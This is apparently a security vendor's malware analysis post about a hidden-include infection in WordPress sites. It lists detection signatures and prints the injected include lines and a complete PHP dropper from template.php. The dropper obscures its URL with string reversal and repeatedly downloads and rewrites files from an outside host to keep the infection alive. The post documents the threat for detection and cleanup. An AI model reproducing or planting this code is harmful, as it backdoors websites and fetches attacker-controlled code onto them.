WordPress Hidden Include

Today we found undetected malware, which keep it hidden and try loading again if it deleted.

We generated Signatures to Detect these hidden includes:

/index.php: {HEX}Malware.Expert.wordpress.hidden.include.0.UNOFFICIAL FOUND
/wp-load.php: {HEX}Malware.Expert.wordpress.hidden.include.1.UNOFFICIAL FOUND
/wp-includes/template.php: {HEX}Malware.Expert.malware.url.7od.info.0.UNOFFICIAL FOUND
/wp-includes/Requests/IPconfig.ini: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND
/wp-includes/js/utilities.js: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND

WordPress

index.php

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */@include( dirname( __FILE__ ) . '/wp-includes/js/utilities.js' );

/**

wp-load.php

End of file:

}
        // Network host configuration. Not recommended edit this code!
                @include ( ABSPATH . WPINC . '/Requests/IPconfig.ini' );

template.php

error_reporting(0); $wp_support = strrev ( '/wordpress/ofni.do7//:ptth' );

if ( is_file ( './index.php' ) == false ) {
	$wp_up_data = curl_init ( $wp_support.'index' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( './index.php' ); file_put_contents ( './index.php', $wp_ip_data ); }

if ( is_file ( './index.php' ) ) {
	if ( filesize ( './index.php' ) <= 498 OR filesize ( './index.php' ) >= 501 ) {
		$wp_up_data = curl_init ( $wp_support.'index' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( './index.php' ); file_put_contents ( './index.php', $wp_ip_data ); }
}

if ( is_file ( ABSPATH . WPINC . '/js/utilities.js' ) == false ) {
	$wp_up_data = curl_init ( $wp_support.'utilities' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/js/utilities.js' ); file_put_contents ( ABSPATH . WPINC . '/js/utilities.js', $wp_ip_data ); }

if ( is_file ( ABSPATH . WPINC . '/js/utilities.js' ) ) {
	if ( filesize ( ABSPATH . WPINC . '/js/utilities.js' ) <= 77100 OR filesize ( ABSPATH . WPINC . '/js/utilities.js' ) >= 88100 ) {
		$wp_up_data = curl_init ( $wp_support.'utilities' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/js/utilities.js' ); file_put_contents ( ABSPATH . WPINC . '/js/utilities.js', $wp_ip_data ); }
} if ( is_file ( './wp-content/uploads/slideshow/cache.ini' ) == false ) {

if ( is_file ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) == false ) {
	$wp_up_data = curl_init ( $wp_support.'ipconfig' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ); file_put_contents ( ABSPATH . WPINC . '/Requests/IPconfig.ini', $wp_ip_data ); }

if ( is_file ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) ) {
	if ( filesize ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) <= 77100 OR filesize ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) >= 88100 ) {
		$wp_up_data = curl_init ( $wp_support.'ipconfig' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ); file_put_contents ( ABSPATH . WPINC . '/Requests/IPconfig.ini', $wp_ip_data ); }
}

if ( stripos ( file_get_contents ( './wp-load.php' ), 'IPconfig.ini' ) == false ) {
	$wp_up_data = curl_init ( $wp_support.'wpload' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 );
		$wp_ip_data = curl_exec ( $wp_up_data );
curl_close ( $wp_up_data ); file_put_contents ( './wp-load.php', $wp_ip_data, FILE_APPEND ); }
}

IPconfig.ini

Remove file

utilities.js

Remove file

Final Words

Use Malware Expert – Signatures detect this malware from files for FREE!